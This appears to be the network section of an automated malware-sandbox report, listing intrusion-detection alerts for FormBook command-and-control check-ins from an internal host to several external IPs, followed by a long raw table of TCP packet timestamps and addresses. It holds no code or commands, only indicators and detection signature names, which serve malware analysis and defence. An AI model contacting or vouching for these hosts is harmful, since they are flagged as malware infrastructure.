2024-11-25T12:01:18.618885+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49797 | 13.248.169.48 | 80 | TCP
2024-11-25T12:01:23.896683+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49799 | 13.248.169.48 | 80 | TCP
2024-11-25T12:01:29.365463+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49802 | 31.31.196.177 | 80 | TCP
2024-11-25T12:01:32.128405+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49803 | 31.31.196.177 | 80 | TCP
2024-11-25T12:01:34.872641+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49804 | 31.31.196.177 | 80 | TCP
2024-11-25T12:01:37.597904+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49805 | 31.31.196.177 | 80 | TCP
2024-11-25T12:02:00.202516+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49809 | 208.91.197.27 | 80 | TCP
2024-11-25T12:02:05.820043+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49810 | 8.210.46.21 | 80 | TCP
2024-11-25T12:02:08.678892+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49811 | 8.210.46.21 | 80 | TCP
2024-11-25T12:02:11.500723+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49812 | 8.210.46.21 | 80 | TCP
2024-11-25T12:02:14.324984+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49813 | 8.210.46.21 | 80 | TCP
2024-11-25T12:02:19.956015+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49814 | 154.88.22.105 | 80 | TCP
2024-11-25T12:02:22.779835+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49815 | 154.88.22.105 | 80 | TCP
2024-11-25T12:02:25.607019+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49816 | 154.88.22.105 | 80 | TCP
2024-11-25T12:02:28.406599+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49817 | 154.88.22.105 | 80 | TCP
2024-11-25T12:02:34.062658+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49818 | 43.155.76.124 | 80 | TCP
2024-11-25T12:02:36.902634+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49819 | 43.155.76.124 | 80 | TCP
2024-11-25T12:02:39.750798+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49820 | 43.155.76.124 | 80 | TCP
2024-11-25T12:02:42.598122+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49821 | 43.155.76.124 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Nov 25, 2024 11:56:56.311732054 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311763048 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311764002 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311774015 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311817884 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311861992 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311871052 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311906099 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311919928 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311949968 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312017918 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312042952 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312062979 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312105894 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312150002 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312160969 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312194109 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312237024 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312278032 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312280893 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312278032 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312325954 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312330961 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312330961 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312370062 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312411070 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312439919 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312439919 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312453985 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312515020 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312541008 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312544107 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312583923 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312594891 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312628031 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312640905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312673092 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312694073 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312694073 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312716007 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312757969 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312799931 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312841892 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312885046 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312889099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312889099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312927008 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312956095 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312998056 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.313043118 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.313052893 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.313054085 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.313054085 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.313215017 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.484469891 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484529018 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484575033 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484622002 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484755039 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.484755993 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.484828949 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485034943 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485105038 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485152006 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485198021 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485207081 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485265970 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485318899 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485361099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485364914 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485361099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485408068 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485454082 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485496998 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485507011 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485507011 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485541105 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485574961 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485583067 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485627890 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485652924 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485652924 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485671043 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485706091 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485716105 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485759020 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485802889 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485817909 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485817909 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485846043 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485889912 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485932112 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485959053 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485959053 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485959053 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485975981 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486020088 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486032963 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486032963 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486063004 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486105919 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486149073 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486154079 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486191988 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486213923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486238003 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486258984 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486279964 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486314058 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486314058 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486324072 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486366034 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486409903 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486452103 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486481905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486495972 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486540079 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486542940 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486582041 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486624956 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486635923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486635923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486635923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486668110 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486692905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486711025 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486754894 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486789942 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486797094 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486841917 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486851931 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486851931 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486851931 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486885071 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486927986 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486969948 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486982107 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486982107 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487011909 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487035036 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487035036 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487056017 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487098932 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487128019 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487140894 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487184048 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487189054 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487189054 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487226009 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487231970 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487231970 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487232924 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487271070 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487313986 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487329960 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487355947 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487377882 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487399101 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487442017 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487464905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487464905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487483978 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487519026 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487529039 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487565041 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487572908 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487616062 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487656116 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487658978 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487703085 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487716913 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487716913 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487746954 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487790108 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487832069 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487840891 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487874985 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487886906 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487886906 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487919092 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487938881 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487938881 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487992048 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488042116 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488085032 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488085985 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488085985 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:58:03.413475990 CET4975080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:03.517266035 CET804975013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:08.756257057 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:08.972493887 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:08.972789049 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:08.976408005 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.192620993 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222405910 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222474098 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222517967 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222704887 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.222728968 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222789049 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222836018 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222995043 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.223057032 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.223179102 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223237991 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223351955 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223400116 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223454952 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.223592043 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.438898087 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.438961029 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439074993 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439122915 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439194918 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439389944 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439409971 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439472914 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439603090 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439647913 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439694881 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439759016 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439903021 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439985037 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440128088 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440165997 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.440228939 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440426111 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.440530062 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440588951 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440818071 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.440921068 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440982103 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441096067 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441142082 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441194057 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.441309929 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.441389084 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441447973 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441643000 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.655459881 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655528069 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655572891 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655616999 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655731916 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.655896902 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.655972004 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656053066 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656097889 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656224966 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656223059 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.656408072 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.656533957 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656593084 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656708956 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656757116 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656831026 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.656965017 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657104015 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657159090 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657377005 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657465935 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657530069 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657577038 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657622099 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657743931 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657805920 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657953978 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658011913 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658128023 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658214092 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658269882 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.658423901 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.658471107 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658529043 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658674002 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:10.477538109 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.493532896 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.707007885 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.707355976 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.713042974 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.926521063 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.965981007 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.965997934 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966222048 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.966289997 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966407061 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966506004 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966516972 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966581106 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.966734886 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.966800928 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966815948 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.967081070 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.967093945 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.967108011 CET804975231.31.196.177192.168.11.20
